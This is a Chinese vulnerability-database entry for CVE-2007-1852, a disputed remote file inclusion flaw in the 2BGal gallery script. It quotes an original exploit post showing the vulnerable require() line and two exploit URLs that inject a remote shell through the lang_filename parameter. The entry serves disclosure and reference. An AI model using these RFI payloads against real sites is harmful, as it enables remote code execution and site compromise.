2BGal 多个PHP代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191110 漏洞类型 未知
发布时间 2007-04-03 更新时间 2007-07-03
CVE编号 CVE-2007-1852 CNNVD-ID CNNVD-200704-070
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2007040025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-070
|漏洞详情
**有争议的**2BGal存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)index.php或(2)backupdb.inc.php的lang_filename参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability

Script: 2BGal

Version: 3.1.1

Download: http://www.ben3w.com/multimedia/2bgal.zip

Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:

admin/index.php   &  backupdb.inc.php   ...... and so on >>

Code:

require($lang_filename);

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

ExploiT:
~~~~~

wWw.site.cOm/[path]/admin/index.php?lang_filename=[ BorN-SHell ]
wWw.site.cOm/[path]/admin/backupdb.inc.php?lang_filename=[ BorN-SHell ]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

GreeTz 2:

str0ke  -  Dr.2  -  AsbMay  ....

AsbMay's Group  &  Kuwait Security

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
|参考资料

来源:XF
名称:2bgal-langfilename-file-include(33375)
链接:http://xforce.iss.net/xforce/xfdb/33375
来源:BUGTRAQ
名称:200703312BGal3.1.1<=(admin/index.php)RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/464458/100/0/threaded
来源:VIM
名称:20070427FALSE->2bgalRFI
链接:http://attrition.org/pipermail/vim/2007-April/001565.html
来源:SREASON
名称:2517
链接:http://securityreason.com/securityalert/2517